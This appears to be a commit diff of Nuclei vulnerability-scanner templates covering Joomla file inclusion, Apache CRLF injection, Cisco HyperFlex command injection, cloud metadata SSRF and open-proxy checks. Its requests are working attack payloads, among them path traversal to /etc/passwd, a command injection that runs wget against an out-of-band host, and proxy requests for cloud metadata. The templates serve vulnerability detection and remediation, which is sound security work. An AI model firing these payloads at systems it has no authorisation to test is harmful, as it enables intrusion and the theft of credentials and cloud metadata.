- https://www.exploit-db.com/exploits/12286
- https://www.cvedetails.com/cve/CVE-2010-1495
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1495
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1531.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component redSHOP 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12054
- https://www.cvedetails.com/cve/CVE-2010-1531
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1531
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

10
cves/2016/CVE-2016-4975.yaml
View File

@ -2,10 +2,14 @@ id: CVE-2016-4975
info:
name: Apache mod_userdir CRLF injection
author: melbadry9,nadino,xElkomy,sullo
severity: low
author: melbadry9,nadino,xElkomy
severity: medium
description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
tags: crlf,generic,cves,cve2016,apache
reference:
- https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
- https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -16,9 +20,9 @@ requests:
- method: GET
path:
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
matchers:
- type: regex
regex:
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
part: header
# Enhanced by cs on 2022/02/14

9
cves/2021/CVE-2021-1497.yaml
View File

@ -1,9 +1,8 @@
id: CVE-2021-1497
info:
name: Cisco HyperFlex HX Data Platform RCE
description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
author: gy741,sullo
author: gy741
severity: critical
reference:
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
@ -19,7 +18,6 @@ info:
cvss-score: 9.80
cve-id: CVE-2021-1497
cwe-id: CWE-78
requests:
- raw:
- |
@ -27,23 +25,20 @@ requests:
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
- |
POST /auth HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by cs on 2022/02/14

1
misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
View File

@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
- "{{BaseURL}}/phpmyadmin/setup/index.php"
- "{{BaseURL}}/pma/setup/index.php"
stop-at-first-match: true
matchers-condition: and

12
misconfiguration/proxy/metadata-alibaba.yaml
View File

@ -1,19 +1,17 @@
id: metadata-service-alibaba
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
name: Alibaba Metadata Service Check
author: sullo
severity: critical
description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://www.alibabacloud.com/help/doc-detail/108460.htm
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,21 +21,19 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
- raw:
- |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- alibaba.interact.sh
- 100.100.100.200
unsafe: true
matchers:
- type: word
part: body
words:
- "zone-id"
# Enhanced by cs on 2022/02/14

12
misconfiguration/proxy/metadata-aws.yaml
View File

@ -1,19 +1,17 @@
id: metadata-service-aws
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
name: Amazon AWS Metadata Service Check
author: sullo
severity: critical
description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,18 +21,15 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
- raw:
- |+
GET http://{{hostval}}/latest/meta-data/ HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- aws.interact.sh
- 169.254.169.254
unsafe: true
matchers:
- type: word
@ -43,3 +38,4 @@ requests:
- "public-ipv4"
- "privateIp"
condition: or
# Enhanced by cs on 2022/02/14

12
misconfiguration/proxy/metadata-azure.yaml
View File

@ -1,19 +1,17 @@
id: metadata-service-azure
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
name: Microsoft Azure Cloud Metadata Service Check
author: sullo
severity: critical
description: The Microsoft Azure cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=windows
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,19 +21,16 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
- raw:
- |+
GET http://{{hostval}}/metadata/instance?api-version=2021-02-01 HTTP/1.1
Host: {{hostval}}
Metadata: true
payloads:
hostval:
- aws.interact.sh
- 169.254.169.254
unsafe: true
matchers:
- type: word
@ -44,3 +39,4 @@ requests:
- "osType"
- "ipAddress"
condition: and
# Enhanced by cs on 2022/02/14

12
misconfiguration/proxy/metadata-digitalocean.yaml
View File

@ -1,19 +1,17 @@
id: metadata-service-digitalocean
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
name: DigitalOcean Metadata Service Check
author: sullo
severity: critical
description: The DigitalOcean host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://developers.digitalocean.com/documentation/metadata/
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,21 +21,19 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
- raw:
- |+
GET http://{{hostval}}/metadata/v1.json HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- aws.interact.sh
- 169.254.169.254
unsafe: true
matchers:
- type: word
part: body
words:
- "droplet_id"
# Enhanced by cs on 2022/02/14

12
misconfiguration/proxy/metadata-google.yaml
View File

@ -1,19 +1,17 @@
id: metadata-service-gcp
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
name: Google GCP Metadata Service Check
author: sullo
severity: critical
description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://cloud.google.com/compute/docs/metadata/default-metadata-values
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,22 +21,20 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
- raw:
- |+
GET http://{{hostval}}/computeMetadata/v1/project/ HTTP/1.1
Host: {{hostval}}
Metadata-Flavor: Google
payloads:
hostval:
- aws.interact.sh
- 169.254.169.254
unsafe: true
matchers:
- type: word
part: body
words:
- "attributes/"
# Enhanced by cs on 2022/02/14

12
misconfiguration/proxy/metadata-hetzner.yaml
View File

@ -1,19 +1,17 @@
id: metadata-service-hetzner
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
name: Hetzner Cloud Metadata Service Check
author: sullo
severity: critical
description: The Hetzner Cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://docs.hetzner.cloud/#server-metadata
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,18 +21,15 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
- raw:
- |+
GET http://{{hostval}}/v1/metadata/private-networks HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- aws.interact.sh
- 169.254.169.254
unsafe: true
matchers:
- type: word
@ -44,3 +39,4 @@ requests:
- "local-ipv4:"
- "instance-id:"
condition: or
# Enhanced by cs on 2022/02/14

12
misconfiguration/proxy/metadata-openstack.yaml
View File

@ -1,5 +1,4 @@
id: metadata-service-openstack
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
@ -7,33 +6,34 @@ id: metadata-service-openstack
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
name: Openstack Metadata Service Check
author: sullo
severity: critical
description: The Openstack host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://docs.openstack.org/nova/latest/admin/metadata-service.html
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
- https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
tags: exposure,config,openstack,proxy,misconfig,metadata
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
- raw:
- |+
GET http://{{hostval}}/openstack/latest HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- aws.interact.sh
- 169.254.169.254
unsafe: true
matchers:
- type: word
part: body
words:
- "vendor_data.json"
# Enhanced by cs on 2022/02/14

16
misconfiguration/proxy/metadata-oracle.yaml
View File

@ -1,40 +1,40 @@
id: metadata-service-oracle
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
info:
name: Oracle Cloud Metadata Service Check
author: sullo
severity: critical
description: The Oracle cloud host is configured as a proxy which allows access to the instance metadata IMDSv1 service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://docs.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
- https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
tags: exposure,config,oracle,proxy,misconfig,metadata
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
- raw:
- |+
GET http://{{hostval}}/opc/v1/instance HTTP/1.1
Host: {{hostval}}
Metadata: true
payloads:
hostval:
- aws.interact.sh
- 169.254.169.254
unsafe: true
matchers:
- type: word
part: body
words:
- "availabilityDomain"
# Enhanced by cs on 2022/02/14

32
misconfiguration/proxy/open-proxy-internal.yaml
View File

@ -1,12 +1,11 @@
id: open-proxy-internal
info:
name: Open Proxy To Internal Network
author: sullo
severity: high
tags: exposure,config,proxy,misconfig,fuzz
description: The host is configured as a proxy which allows access to other hosts on the internal network.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports.
reference:
- https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/
- https://en.wikipedia.org/wiki/Open_proxy
@ -15,109 +14,83 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-441
requests:
- raw:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
- |+
GET http://192.168.0.1/ HTTP/1.1
Host: 192.168.0.1
- |+
GET https://192.168.0.1/ HTTP/1.1
Host: 192.168.0.1
- |+
GET http://192.168.0.1:22/ HTTP/1.1
Host: 192.168.0.1
- |+
GET http://192.168.1.1/ HTTP/1.1
Host: 192.168.1.1
- |+
GET https://192.168.1.1/ HTTP/1.1
Host: 192.168.1.1
- |+
GET http://192.168.1.1:22/ HTTP/1.1
Host: 192.168.1.1
- |+
GET http://192.168.2.1/ HTTP/1.1
Host: 192.168.2.1
- |+
GET https://192.168.2.1/ HTTP/1.1
Host: 192.168.2.1
- |+
GET http://192.168.2.1:22/ HTTP/1.1
Host: 192.168.2.1
- |+
GET http:/10.0.0.1/ HTTP/1.1
Host: 10.0.0.1
- |+
GET https://10.0.0.1/ HTTP/1.1
Host: 10.0.0.1
- |+
GET http://10.0.0.1:22/ HTTP/1.1
Host: 10.0.0.1
- |+
GET http:/172.16.0.1/ HTTP/1.1
Host: 172.16.0.1
- |+
GET https://172.16.0.1/ HTTP/1.1
Host: 172.16.0.1
- |+
GET http://172.16.0.1:22/ HTTP/1.1
Host: 172.16.0.1
- |+
GET http:/intranet/ HTTP/1.1
Host: intranet
- |+
GET https://intranet/ HTTP/1.1
Host: intranet
- |+
GET http://intranet:22/ HTTP/1.1
Host: intranet
- |+
GET http:/mail/ HTTP/1.1
Host: mail
- |+
GET https://mail/ HTTP/1.1
Host: mail
- |+
GET http://mail:22/ HTTP/1.1
Host: mail
- |+
GET http:/ntp/ HTTP/1.1
Host: ntp
- |+
GET https://ntp/ HTTP/1.1
Host: ntp
- |+
GET http://ntp:22/ HTTP/1.1
Host: ntp
unsafe: true
matchers:
- type: dsl
@ -133,4 +106,5 @@ requests:
- (!contains(body_1, "Microsoft Azure App")) && (contains(body_2, "Microsoft Azure App") || contains(body_3, "Microsoft Azure App")) || contains(body_4, "Microsoft Azure App") || contains(body_5, "Microsoft Azure App") || contains(body_6, "Microsoft Azure App") || contains(body_7, "Microsoft Azure App") || contains(body_8, "Microsoft Azure App") || contains(body_9, "Microsoft Azure App") || contains(body_10, "Microsoft Azure App") || contains(body_11, "Microsoft Azure App") || contains(body_12, "Microsoft Azure App") || contains(body_13, "Microsoft Azure App") || contains(body_14, "Microsoft Azure App") || contains(body_15, "Microsoft Azure App") || contains(body_16, "Microsoft Azure App") || contains(body_17, "Microsoft Azure App") || contains(body_18, "Microsoft Azure App") || contains(body_19, "Microsoft Azure App") || contains(body_20, "Microsoft Azure App") || contains(body_21, "Microsoft Azure App") || contains(body_22, "Microsoft Azure App") || contains(body_23, "Microsoft Azure App")
- (!contains(body_1, "ssh")) && (contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh")
- (!contains(body_1, "SSH")) && (contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH")
condition: or
condition: or
# Enhanced by cs on 2022/02/14

11
misconfiguration/proxy/open-proxy-localhost.yaml
View File

@ -1,12 +1,11 @@
id: open-proxy-http-portscan
info:
name: Open Proxy to Other Web Ports on Proxy's localhost Interface
author: sullo
severity: high
tags: exposure,config,proxy,misconfig,fuzz
description: The host is configured as a proxy which allows access to web ports on the host's internal interface.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports.
reference:
- https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/
- https://en.wikipedia.org/wiki/Open_proxy
@ -15,33 +14,26 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-441
requests:
- raw:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
- |+
GET http://somethingthatdoesnotexist/ HTTP/1.1
Host: somethingthatdoesnotexist
- |+
GET http://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1
- |+
GET https://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1
- |+
GET http://localhost/ HTTP/1.1
Host: localhost
- |+
GET https://localhost/ HTTP/1.1
Host: localhost
unsafe: true
req-condition: true
stop-at-first-match: true
@ -59,3 +51,4 @@ requests:
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
- (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works"))
# Enhanced by cs on 2022/02/14